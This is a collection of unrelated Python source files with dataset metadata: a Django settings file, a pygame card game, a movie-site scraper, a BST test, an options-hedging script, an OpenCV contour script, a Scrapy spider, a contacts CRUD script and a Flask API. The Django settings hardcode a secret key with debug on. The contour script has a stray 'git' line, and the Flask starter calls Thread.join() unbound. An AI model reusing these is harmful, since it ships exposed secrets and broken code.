' % (\n self.prefix,\n self._getCSSClass('table'),\n self.renderContents(),\n self.script(**self.getDataTableConfig()))\n\n\nclass AjaxContainerListing(common.AjaxContainerListing):\n formatter_factory = ContextDataTableFormatter\n \n @property\n def prefix(self):\n context = proxy.removeSecurityProxy(self.context)\n return \"container_contents_%s\" % (context.__name__)\n\n","sub_path":"bungeni.main/branches/mr/bungeni/ui/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"397808799","text":"\"\"\"\nDjango settings for authoringtool project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n \nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '%9xk4ygdnnv128b15+*u#3&tk!d#zi_c!lcd#uwdwimi@yp&n#'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'sequencelistings',\n\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 
'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'authoringtool.urls'\n\nWSGI_APPLICATION = 'authoringtool.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\nSTATIC_ROOT = '' # added to avoid AttributeError: 'NoneType' object has no attribute 'endswith' which is thrown when running selenium tests from functional_tests\nSTATIC_URL = '/static/'\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\n\nLOGIN_URL = 'accounts/login/'\n\nREGISTRATION_OPEN = True # If True, users can register\nACCOUNT_ACTIVATION_DAYS = 7 # One-week activation window; you may, of course, use a different value.\nREGISTRATION_AUTO_LOGIN = True # If True, the user will be automatically logged in.\nLOGIN_REDIRECT_URL = '/sequencelistings/' # The page you want users to arrive at after they successful log in\nLOGIN_URL = '/accounts/login/' # The page users are directed to if they are not logged in,\n # and are trying\n\n# logging\n# LOGGING = {\n# 'version': 1,\n# 'disable_existing_loggers': False,\n# 'formatters': {\n# 'verbose': {\n# 'format' : \"[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\",\n# 'datefmt' : \"%d/%b/%Y %H:%M:%S\"\n# },\n# 'simple': {\n# 'format': '%(levelname)s %(message)s'\n# },\n# },\n# 'handlers': {\n# 'file': {\n# 'level': 'WARNING',\n# 'class': 'logging.FileHandler',\n# 'filename': os.path.join(BASE_DIR, 'log', 'authoringtool.log'),\n# 'formatter': 'verbose'\n# },\n# },\n# 'loggers': {\n# 'django': {\n# 'handlers':['file'],\n# 'propagate': True,\n# 
'level':'WARNING',\n# },\n# 'sequencelistings': {\n# 'handlers': ['file'],\n# 'level': 'WARNING',\n# },\n# }\n# }\n","sub_path":"authoringtool/authoringtool/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"447256884","text":"import pygame\nimport time\nfrom enum import Enum\n\nfrom outputters.outputter import Outputter\n\n\nclass Colour(Enum):\n WHITE = (255, 255, 255)\n BLACK = (0, 0, 0)\n RED = (255, 0, 0)\n GREEN = (0, 255, 0)\n BLUE = (0, 0, 255)\n PURPLE = (255, 0, 255)\n GREY = (180, 180, 180)\n\n\nclass Graphics(Outputter):\n def __init__(self, width, height):\n pygame.init()\n pygame.display.set_caption(\"Big2\")\n self.width = width\n self.height = height\n self.card_width = self.width / 16\n self.card_height = self.height / 8\n self.screen = pygame.display.set_mode((self.width, self.height))\n\n def choose_cards(self, hand):\n selected_cards = []\n while True:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP:\n position = pygame.mouse.get_pos()\n if self.play_button.collidepoint(position):\n return selected_cards\n elif any(card.image.collidepoint(position) for card in hand):\n clicked_card = next(\n (y for y in hand if y.image.collidepoint(position)), None\n )\n self.handle_card_click(clicked_card, selected_cards)\n elif event.type == pygame.QUIT:\n pygame.quit()\n\n def handle_card_click(self, clicked_card, selected_cards):\n if clicked_card in selected_cards:\n selected_cards.remove(clicked_card)\n self.move_card_vertically(clicked_card, self.card_height / 2)\n else:\n selected_cards.append(clicked_card)\n self.move_card_vertically(clicked_card, -self.card_height / 2)\n\n def move_card_vertically(self, card, distance):\n pygame.draw.rect(\n self.screen,\n Colour.WHITE.value,\n (card.left, card.top, self.card_width, self.card_height),\n 0,\n )\n self.display_single_card(card, card.left, 
card.top + distance)\n pygame.display.update()\n\n def display_single_card(self, card, left, top):\n card.left = left\n card.top = top\n card.image = pygame.draw.rect(\n self.screen, card.colour, (left, top, self.card_width, self.card_height), 0\n )\n self.display_text(\n str(card.pp_value), 60, Colour.GREY.value, card.colour, (left, top)\n )\n\n def display_text(self, text, size, colour, background, location):\n basic_font = pygame.font.SysFont(None, size)\n words = basic_font.render(text, True, colour, background)\n self.screen.blit(words, location)\n\n def display_player(self, player, cards):\n self.screen.fill(Colour.WHITE.value)\n pygame.draw.ellipse(\n self.screen,\n Colour.GREY.value,\n (self.width / 6, self.height / 4, 2 * self.width / 3, self.height / 2),\n 0,\n )\n self.play_button = pygame.draw.rect(\n self.screen,\n Colour.GREY.value,\n (\n 6 * self.width / 7,\n 3 * self.height / 4,\n 2.1 * self.card_width,\n 0.5 * self.card_height,\n ),\n 0,\n )\n self.display_text(\n \"Play/pass\",\n 30,\n Colour.PURPLE.value,\n Colour.GREY.value,\n (6 * self.width / 7, 3 * self.height / 4),\n )\n self.display_text(\n f\"Player {player.name}:\",\n 30,\n Colour.PURPLE.value,\n Colour.WHITE.value,\n (0, 3 * self.height / 4),\n )\n self.display_cards(\n cards,\n self.width / 2 - 2.5 * self.card_width,\n self.height / 2 - 0.5 * self.card_height,\n )\n\n def display_cards(self, cards, left, top):\n for i in range(0, len(cards)):\n self.display_single_card(cards[i], left + i * self.card_width, top)\n pygame.display.update()\n\n def display_message(self, message):\n self.display_text(\n message,\n 30,\n Colour.PURPLE.value,\n Colour.GREY.value,\n (self.width / 10, self.height / 3),\n )\n pygame.display.update()\n time.sleep(5)\n\n def error(self, message):\n pass\n # self.display_text(message, 30, Colour.PURPLE.value, Colour.GREY.value, (self.width/10, self.height/3))\n # pygame.display.update()\n # 
time.sleep(5)\n","sub_path":"outputters/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"476470294","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import registry\nfrom sqlalchemy.schema import MetaData\n\n__all__ = ['metadata', 'mapper_registry']\n\n# Recommended naming convention used by Alembic, as various different database\n# providers will autogenerate vastly different names making migrations more\n# difficult. See: https://alembic.sqlalchemy.org/en/latest/naming.html\nNAMING_CONVENTION = {\n \"ix\": \"ix_%(column_0_label)s\",\n \"uq\": \"uq_%(table_name)s_%(column_0_name)s\",\n \"ck\": \"ck_%(table_name)s_%(constraint_name)s\",\n \"fk\": \"fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s\",\n \"pk\": \"pk_%(table_name)s\"\n}\n\nmetadata = MetaData(naming_convention=NAMING_CONVENTION)\nmapper_registry = registry(metadata=metadata)\n#Base = declarative_base(metadata=metadata)\n","sub_path":"amnesia/db/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"495514120","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 31 00:34:05 2019\n\n@author: nghdavid\n\"\"\"\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\n\n\n# It takes a yahoo website as input\n# It returns a panda dataframe that contains lists of Chinese names and English names and schedule websites and movie websites and introductions\ndef yahooMovieParser(url):\n r = requests.get(url)\n web_content = r.text\n soup = BeautifulSoup(web_content,'lxml')\n #時刻表\n newMovie3 = soup.find_all('div',class_=\"release_btn color_btnbox\")\n \n links = []\n for t in newMovie3:\n try:\n 
links.append(t.find('a',class_=\"btn_s_time gabtn\")['href'])\n except:\n links.append(0)\n \n \n # 中英文片名\n newMovie2 = soup.find_all('div', class_ = \"release_movie_name\")\n NameCHs = [t.find('a', class_='gabtn').text.replace('\\n','').replace(' ','') for t in newMovie2]\n NameENs = [t.find('div', class_='en').find('a').text.replace('\\n','').replace(' ','') for t in newMovie2]\n \n #Movie website\n websites = [t.find('a', class_='gabtn')['href'] for t in newMovie2]\n \n # 電影介紹\n newMovie4 = soup.find_all('div',class_=\"release_text\")\n Intros = [t.find('span').text.replace('\\n','').replace('\\r','').replace('\\xa0','').replace(' ','') for t in newMovie4]\n #合併成data frame\n df = pd.DataFrame(\n {\n 'Name':NameCHs,\n 'EnName':NameENs,\n 'time': links,\n 'Intro': Intros,\n 'Web': websites\n })\n return df\n\n#A function that take website as input\n#It returns next webpage\ndef getNext(url):\n r = requests.get(url)\n web_content = r.text\n soup = BeautifulSoup(web_content,'lxml')\n pageInfo = soup.find('div', class_='page_numbox')\n tagA = pageInfo.find('li', class_=\"nexttxt\").find('a')\n if tagA:\n return tagA['href']\n else:\n return None\n \n#A function that take schedule website as input\n#It returns a dictionary that store time\ndef get_schedule(html):\n schedule = {}\n for i in html.find('div.area_timebox'):\n city = i.text[0:2]\n theater_schedule = {}#It store theaters in a same city\n for theater in i.find('ul'):\n \n times = []\n t = theater.text\n t = t.split(' ')\n for x in range(len(t)):\n if x >0:\n times.append(t[x][-5:-1]+t[x][-1])#time as string\n theater_schedule[t[0]] = times#t[0] is theater \n \n schedule[city] = theater_schedule\n return schedule\n\n#Input 為 電影的主頁\n#Output 為 電影種類 imdb分數 上映日期 電影長度 電影圖片網址\n#如果查不到 imdb,就回傳 電影種類 -1 上映日期 電影長度 電影圖片網址\ndef get_type(time_url):\n #進到網頁拿html\n r = requests.get(time_url)\n web_content = r.text\n soup = BeautifulSoup(web_content,'lxml')\n info = soup.find('div', class_='level_name')\n info1 = 
soup.find_all('span')\n types = info.text.replace('\\n','').replace(' ','')\n types = types.split('/')\n photo = soup.find('div', class_='movie_intro_foto').find('img')['src']\n has_imdb = 0#有無imdb\n for i in info1:\n if i.text[0:4] == 'IMDb':\n imdb = float(i.text[7:-1]+i.text[-1])\n has_imdb = 1\n if i.text[0:4] == '上映日期':\n date = i.text[5:-1]+i.text[-1]\n if len(i.text)>0:\n if i.text[0] == '片':\n length = i.text[6:-1]+i.text[-1]\n if has_imdb:\n return types,imdb,date,length,photo\n else:\n return types,-1,date,length,photo\n \n\n\nurl = 'http://movies.yahoo.com.tw/movie_intheaters.html'\nurlList = []\n \nwhile url:\n urlList.append(url)\n url = getNext(url)\n\n#Get Chinese names and English names and schedule websites and movie websties and introductions\nMovieInfo = None\nfor url in urlList:\n d1 = yahooMovieParser(url)\n if MovieInfo is None:\n MovieInfo = d1\n else:\n MovieInfo = MovieInfo.append(d1,ignore_index=True)\n\n#\n#Get schedules\nschedules = []\nfor time_url in MovieInfo['time']:\n print(\"Get schedule\")\n print(time_url)\n if time_url == 0:\n schedule = 0\n schedules.append(schedule)\n continue\n session = HTMLSession()\n r = session.get(time_url)\n r.html.render(timeout=100)\n schedules.append(get_schedule(r.html))\nMovieInfo['schedule'] = schedules\n\n#爬 電影種類 imdb分數 上映日期 電影長度 電影圖片網址\ntypes = []\nimdbs = []\ndates = []\nlengths = []\nphotos = []\nfor time_url in MovieInfo['Web']:\n movie_type,imdb,date,length,photo = get_type(time_url)\n types.append(movie_type)\n ################################\n imdbs.append(imdb)#請注意,如果imdb為-1這代表查不到imdb\n ################################\n dates.append(date)\n lengths.append(length)\n photos.append(photo)\n#併到dataframe\nMovieInfo['type'] = types\nMovieInfo['imdb'] = imdbs\nMovieInfo['release_date'] = dates\nMovieInfo['length'] = lengths\nMovieInfo['photo_website'] = photos#電影圖片網址\n\n\"\"\"\nfor i in range(len(MovieInfo)):\n print(MovieInfo['Name'][i]) \n print(MovieInfo['type'][i])\n 
print(MovieInfo['imdb'][i])\n print(MovieInfo['release_date'][i])\n print(MovieInfo['length'][i])\n print(MovieInfo['photo_website'][i])\n print()\n\"\"\"\nprint(\"david part finish\")\n\n\nMovielist = [] # Movie名稱陣列\n \n\nfor i in range(len(MovieInfo)):\n\tMovielist.append(MovieInfo['Name'][i]) \n\t\n\n#print(Movielist)\n\n\nCount = 0\nMoviedict = {}\t #電影的dictionary\n\n\nfor j in Movielist:\n\tMoviedict[j] = []\n\tMoviedict[j].append(MovieInfo['Name'][Count]) #中文名稱\n\tMoviedict[j].append(MovieInfo['type'][Count]) #類型\n\tMoviedict[j].append(MovieInfo['release_date'][Count]) #上映時間\n\tMoviedict[j].append(MovieInfo['length'][Count]) #長度\n\tMoviedict[j].append(MovieInfo['imdb'][Count]) #IMDB分數\n\tMoviedict[j].append(MovieInfo['Intro'][Count]) #簡介\n\tMoviedict[j].append(MovieInfo['schedule'][Count]) #時間表\n\tMoviedict[j].append(MovieInfo['photo_website'][Count]) #圖片網址\n\t\n\n\n\tCount += 1\n\"\"\"\n\tfor i in range(8):\n\t\tprint(Moviedict[j][i]) #印出有分行版\n\n\"\"\"\nprint(Moviedict) #印出無分行版\n\n","sub_path":"DICT-final.py","file_name":"DICT-final.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"551890384","text":"from algo_ds.cormen_bst import *\nimport unittest\n\nclass TestBst(unittest.TestCase):\n def test_insert_delete(self):\n # insertion\n bst = BST()\n node50 = Node(50)\n bst.insert(node50)\n bst.insert(Node(40))\n node20 = Node(20)\n bst.insert(node20)\n node10 = Node(10)\n bst.insert(node10)\n bst.insert(Node(30))\n bst.insert(Node(60))\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [10, 20, 30, 40, 50, 60])\n self.assertEqual(bst.root.left.key, 40)\n self.assertEqual(bst.root.left.left.key, 20)\n\n # deletion\n bst.delete(node10)\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [20, 30, 40, 50, 60])\n\n bst.delete(node20)\n res = []\n bst.root.inorder_walk(lambda node: 
res.append(node.key))\n self.assertEqual(res, [30, 40, 50, 60])\n\n bst.delete(node50)\n res = []\n bst.root.inorder_walk(lambda node: res.append(node.key))\n self.assertEqual(res, [30, 40, 60])\n","sub_path":"tests/test_cormen_bst.py","file_name":"test_cormen_bst.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282652985","text":"import exotic_options.exotic_option_utilities as exotic_util\nimport Utilities.svi_prepare_vol_data as svi_data\nfrom bs_model import bs_estimate_vol as bs_vol\nfrom Utilities.utilities import *\nimport Utilities.hedging_utility as hedge_util\nimport os\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Utilities.plot_util as pu\nimport math\n\nwith open(os.path.abspath('..')+'/intermediate_data/total_hedging_daily_params_calls_1.pickle','rb') as f:\n daily_params = pickle.load(f)[0]\nwith open(os.path.abspath('..') + '/intermediate_data/total_hedging_dates_calls_1.pickle', 'rb') as f:\n dates = pickle.load(f)[0]\nwith open(os.path.abspath('..')+'/intermediate_data/total_hedging_daily_svi_dataset_calls_1.pickle','rb') as f:\n daily_svi_dataset = pickle.load(f)[0]\nwith open(os.path.abspath('..') +'/intermediate_data/total_hedging_bs_estimated_vols.pickle','rb') as f:\n estimated_vols = pickle.load(f)[0]\n\n# Evaluation Settings\nbegDate = ql.Date(19,1,2017)\ncalendar = ql.China()\ndaycounter = ql.ActualActual()\nbegDate = calendar.advance(begDate,ql.Period(1,ql.Days))\nfee = 0.6/100\nsimDates = 50\nnp.random.seed()\nnoise = np.random.normal(0, 1, simDates)\n\ncurve = svi_data.get_curve_treasury_bond(begDate,daycounter)\ncal_vols, put_vols, maturity_dates, S0, risk_free_rates = daily_svi_dataset.get(to_dt_date(begDate))\nmaturityDate = to_ql_date(maturity_dates[3])\n\n# Down and out Call\noptiontype = ql.Option.Call\n\nstrike = S0\n# Knock out : Barrier at OTM\nbarriers = [S0-0.1]\nbarrierType = 
ql.Barrier.DownOut\n# Reverse knock out : Barrier at ATM\n#barriers = [S0+0.1]\n#barrierType = ql.Barrier.IpOut\n\nexercise = ql.EuropeanExercise(maturityDate)\npayoff = ql.PlainVanillaPayoff(optiontype, strike)\nunderlying = ql.SimpleQuote(S0)\n\ncalibrated_params = daily_params.get(to_dt_date(begDate)) # on calibrate_date\nblack_var_surface = hedge_util.get_local_volatility_surface(calibrated_params, to_ql_dates(maturity_dates),\n begDate, daycounter, calendar, S0,\n risk_free_rates)\nconst_vol = estimated_vols.get(to_dt_date(begDate))\nyield_ts = ql.YieldTermStructureHandle(curve)\ndividend = ql.YieldTermStructureHandle(ql.FlatForward(begDate, 0.0, daycounter))\nrf = curve.zeroRate(maturityDate, daycounter, ql.Continuous).rate()\nprocess_svi = ql.BlackScholesMertonProcess(ql.QuoteHandle(underlying), dividend,\n yield_ts, ql.BlackVolTermStructureHandle(black_var_surface))\nplot = True\nprint(\"=\" * 120)\nprint(\"%15s %20s %20s %20s %20s \" % (\"barrier\", \"hedge_error_bs\", \"hedge_error_svi\",\n \"hedge_cost_bs\", \"hedge_cost_svi\"))\nfor barrier in barriers:\n\n barrier_flag = False\n if plot:\n print(\"=\"*100)\n print(\"%15s %25s %25s %25s\" % (\"maturityDate\",\"barrier\",\"strike\", \"spot\"))\n print(\"%15s %25s %25s %25s\" % (maturityDate,barrier,strike, S0))\n print(\"=\"*100)\n\n if plot:\n print(\"=\"*120)\n print(\"%15s %15s %15s %15s %15s %15s %15s\" % (\"date\",\"spot\",\"hedging_error_bs\",\n \"hedging_error_svi\",\"replicate_bs\",\n \"replicate_svi\",\"reference_npv\"))\n print(\"-\"*120)\n delta_bs_previous = 0.0\n delta_svi_previous = 0.0\n hedging_errors_bs = []\n hedging_errors_svi = []\n hedging_costs_bs = []\n hedging_costs_svi = []\n path = []\n delta_t = 1.0/251\n spot = S0\n ttm = daycounter.yearFraction(begDate, maturityDate)\n vol_svi = black_var_surface.blackVol(ttm, strike)\n underlying.setValue(spot)\n option_price = exotic_util.barrier_npv_ql(begDate, path, barrierType, barrier, payoff, exercise,\n process_svi)\n for nbr_date in 
range(simDates):\n date = calendar.advance(begDate,ql.Period(nbr_date,ql.Days))\n # Delta hedge\n if option_price == 0.0:\n delta_bs = 0.0\n delta_svi = 0.0\n else:\n delta_bs = hedge_util.calculate_delta_bs(date, daycounter, calendar,\n const_vol, spot, rf, strike, maturityDate, optiontype)\n delta_svi = hedge_util.calculate_delta_svi(black_var_surface, date, daycounter, calendar, spot,\n curve.zeroRate(maturityDate, daycounter, ql.Continuous).rate(),\n strike, maturityDate, optiontype)\n underlying.setValue(spot)\n option_price = exotic_util.barrier_npv_ql(begDate, path, barrierType, barrier, payoff, exercise,\n process_svi)\n path.append(spot)\n\n spot = spot + rf * spot * delta_t + vol_svi * spot * np.sqrt(delta_t) * noise.item(nbr_date)\n cash_svi = (option_price - delta_svi * spot)* math.exp(rf* delta_t)\n cash_bs = (option_price - delta_bs * spot)* math.exp(rf* delta_t)\n replicate_svi = delta_svi * spot + cash_svi\n replicate_bs = delta_bs * spot + cash_bs\n hedging_error_bs = replicate_bs - option_price\n hedging_error_svi = replicate_svi - option_price\n hedging_errors_bs.append(hedging_error_bs)\n hedging_errors_svi.append(hedging_error_svi)\n # hedging_costs_bs.append(hedge_cost_bs)\n # hedging_costs_svi.append(hedge_cost_svi)\n if plot: print(\"%15s %15s %15s %15s %15s %15s %15s\" % (date,\n round(spot, 4),\n round(hedging_error_bs, 4),\n round(hedging_error_svi, 4),\n round(replicate_bs, 4),\n round(replicate_svi, 4),\n round(option_price, 4)))\n\n if plot:\n print(\"=\" * 120)\n print(\"%15s %20s %20s %20s %20s \" % (\"barrier\", \"hedge_error_bs\", \"hedge_error_svi\",\n \"hedge_cost_bs\", \"hedge_cost_svi\"))\n print(\"-\" * 120)\n print(\"%15s %20s %20s %20s %20s \" % (barrier, round(sum(hedging_errors_bs), 4),\n round(sum(hedging_errors_svi), 4),\n round(sum(hedging_costs_bs), 4),\n round(sum(hedging_costs_svi), 4)))\nprint(\"=\" * 
120)\n","sub_path":"exotic_options/delta_hedge_knock_out_call_mc.py","file_name":"delta_hedge_knock_out_call_mc.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653888199","text":"'''import cv2\nimport imutils\n\n\n\nimage = cv2.imread('tetris_blocks.png')\n\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (4,4),0)\n\nthresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n\n'''\n\nimport imutils\nimport cv2\n\n#load image as a grayscale\nimage = cv2.imread('puzzle.jpg',0)\n#gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncv2.imshow('gray', image)\nblurred = cv2.GaussianBlur(image, (5, 5), 0)\ncv2.imshow('blurred', blurred)\nthresh = cv2.threshold(blurred, 200, 255, cv2.THRESH_BINARY)[1]\ncv2.imshow('blurred', thresh)\n\n# find contours in the thresholded image\ncnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\ncnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\nfor c in cnts:\n M = cv2.moments(c)\n # to get center of contour\n\n # to check if m00 is zero or not to avoid DivisionByZero error\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n\n\n cv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n cv2.circle(image, (cX, cY), 5, (255, 255, 255), -1)\n cv2.putText(image, \"center\", (cX - 30, cY - 30),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n\n git\n cv2.imshow(\"Image\", image)\n cv2.waitKey(0)\n\n","sub_path":"Contour Play/center_of_contours.py","file_name":"center_of_contours.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"318215323","text":"\"\"\"\nThis spider is a TimePartner spider created on top of the ATSSpider\nscrapy crawl timepartner -a mining_job_id=9999 -a iteration=1 -a extract=1 -a 
url=\"http://www.timepartner.com/jobs/uebersicht/suche.html\"\n\nsample url:\nhttp://www.timepartner.com/jobs/uebersicht/suche.html\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveBadElements\n\n\nclass TimePartner(ATSSpider):\n\n name = \"timepartner\"\n url_anchor = \"/no_cache/jobs/uebersicht/suche/jobsearch//0/0/0//%s.html?tx_timepartnerjobs_pi1[geofilterrad]=200\"\n cur_page = 0\n ref_re = compile(r\"(\\d+)\\.htm\")\n\n def start_requests(self):\n yield Request(\n urljoin(\n self.start_urls[0], self.url_anchor % self.cur_page\n )\n )\n\n def parse(self, response):\n sel = Selector(response)\n if self.cur_page == 0:\n job_count = sel.xpath(\n '//div[@class=\"tx-timepartnerjobs-pi1\"]/h3/text()').extract()\n if job_count:\n self.expected_job_count = job_count\n\n logo_url = sel.xpath('//div[@id=\"logo\"]/a/img/@src').extract()\n if logo_url:\n self.logo_url = urljoin(response.url, '/%s' % logo_url[0])\n\n self.cur_page += 1\n jobs = sel.xpath('//table[@class=\"tx_timepartnerjobs_pi1_table\"]//tr')\n for job in jobs:\n job_url = job.xpath('./td/a/@href').extract()\n if job_url:\n job_url = urljoin(response.url, '/%s' % (job_url[0]))\n meta = {\n 'title': job.xpath('./td/a/text()').extract(),\n 'loc': job.xpath('./td[3]/text()').extract(),\n }\n yield Request(\n job_url, callback=self.parse_job_callback(), meta=meta\n )\n\n next_url = sel.xpath(\n '//a[img[contains(@src, \"pagebrowser_next\")]]/@href').extract()\n if next_url:\n next_url = urljoin(\n self.start_urls[0], self.url_anchor % self.cur_page\n )\n yield Request(next_url, callback=self.parse)\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n 
loader.add_value('location', response.meta['loc'])\n loader.add_value('logo_url', self.logo_url)\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.ref_re\n )\n\n loader.add_xpath(\n 'description',\n '//div[@id=\"content_maincol\"]/h1[last()]/following-sibling::node()',\n RemoveBadElements(['img', 'a', 'form'])\n )\n loader.add_xpath(\n 'jobtype',\n '//strong[text()=\"Arbeitszeit: \"]/following-sibling::text()[1]'\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/timepartner.py","file_name":"timepartner.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259812458","text":"class Personas:\n\tpass\n\tdef __init__(self,nombre,cedula,telefono,email):\n\t\tself.nombre = nombre\n\t\tself.cedula = cedula\n\t\tself.telefono = telefono\n\t\tself.email = email\n\t\n\tdef __str__(self):\n\t\treturn f\"Nombre: {self.nombre}, cedula: {self.cedula}, telefono: {self.telefono}, email: {self.email}\"\n\t\n\tdef cambiar_datos(self, nombre, cedula, telefono, email):\n\t\tself.nombre = nombre\n\t\tself.cedula = cedula\n\t\tself.telefono = telefono\n\t\tself.email = email\n\t\t\ndef agregar():\n nombre = input(\"Nombre: \")\n cedula = input(\"Cedula: \")\n telefono =input(\"Telefono: \")\n email = input(\"Email: \")\n usuario = Personas(nombre,cedula,telefono,email)\n listadepersonas.append(usuario)\n\ndef verc():\n\tfor i in range(0,len(listadepersonas)):\n\t\tprint(f\"{i + 1}- {listadepersonas[i]}\")\n\ndef eliminar():\n\tverc()\n\topcion = input(\"Indique la posición del usuario que desea eliminar: \")\n\topcion= int(opcion)\n\topcion = opcion - 1\n\tlistadepersonas.pop(opcion)\n\ndef modificar():\n\tverc()\n\tmod = int(input(\"Indica la posición del usuario que quieres modificar: \"))\n\tnombre = input(\"Introduce el nuevo nombre: \")\n\ttelefono = input(\"Introduce el nuevo telefono: \")\n\tcedula = 
input(\"Introduce la nueva cedula: \")\n\temail = input(\"Introduce el nuevo email: \")\n\tlistadepersonas[mod - 1].cambiar_datos(nombre,cedula, telefono, email)\n\t\n\nlistadepersonas = []\n\t\nwhile True:\t\t\n\t\t\n print(\"----------Menu---------------------\\n\")\n print(\"A. Para agregar \")\n print(\"B. Para borrar\")\n print(\"C. Para ver las personas agregadas \")\n print(\"D. Para modificar a algun usuario\\n\")\n print(\"Cualquier tecla para salir \")\n \n print(\"-----------------------------------\")\n opc = input(\"Por favor seleccione una opción: \")\n if opc == \"a\":\n \tagregar()\n elif opc == \"b\":\n \teliminar()\n elif opc == \"c\":\n \tverc()\n elif opc == \"d\":\n \tmodificar()\n else:\n \tbreak","sub_path":"POO.py","file_name":"POO.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"52936440","text":"import threading\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\n# create a variable to store the data\ndata = None\n# create the Flask application\napp = Flask(__name__)\n# make cross-origin AJAX possible\nCORS(app)\n\n# create a method to send the data to the API when requested\n@app.route(\"/\")\ndef send_data():\n # convert into JSON format first\n return jsonify(data)\n\ndef start(host, port):\n # get the host and the port as keywords attributes for app.run()\n app_kwargs = {'host':host, 'port':port}\n # run the app on a thread\n threading.Thread(target=app.run, kwargs=app_kwargs).start()\n threading.Thread.join()\n","sub_path":"Api/Api.py","file_name":"Api.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"129501224","text":"import numpy as 